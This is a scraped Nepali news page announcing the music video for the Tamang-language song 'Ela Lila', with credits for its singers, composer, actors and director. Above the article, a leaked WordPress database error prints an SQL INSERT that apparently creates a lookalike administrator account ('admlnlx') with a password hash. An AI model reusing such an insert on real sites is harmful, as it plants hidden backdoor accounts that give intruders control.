WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByD7CyGHnx.tXi50MjN485tIe7CbdV1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:11:03', '', 'admlnlx', 'admlnlx')

‘एला लिला’को म्यूजिक भिडियो सार्वजनिक (भिडियो सहित) – Gaule Khabar

‘एला लिला’को म्यूजिक भिडियो सार्वजनिक (भिडियो सहित)

‘एला लिला’को म्यूजिक भिडियो सार्वजनिक (भिडियो सहित)

गाउँले न्युज, काठमाण्डौ । तामाङ भाषाको नयाँ गीत ‘एला लिला’को म्यूजिक भिडियो सार्वजनिक भएको छ ।

‘एला लिला’ आशिक तामाङ दोङको शब्द जितु लोप्चन र प्रशान्त दोङको आवाजमा रहेको गीत कर्साङ लामाको संगीत तथा एरेञ्जमा तयार भएको हो । भिडियोलाई म्हारमेन मिडियाको अफिसियल युट्युब च्यानल मार्फत सार्वजनिक गरिएको छ ।

गीतको म्युजिक भिडियोमा तामाङ चलचित्र क्षेत्रको सदाबहार नायक अमिर दोङ र पुर्णिमा लामा थोकरले फिचरिङ्ग गरेका छन ।

मायापिरतिमा आधारित गीतको म्यूजिक भिडियोलाई गंगाराम राईले छायाङ्कन, हेरुका लामाको न्यृत्य निर्देशन रहेकोछ भने नायक दोङकै निर्देशन तथा सम्पादन रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका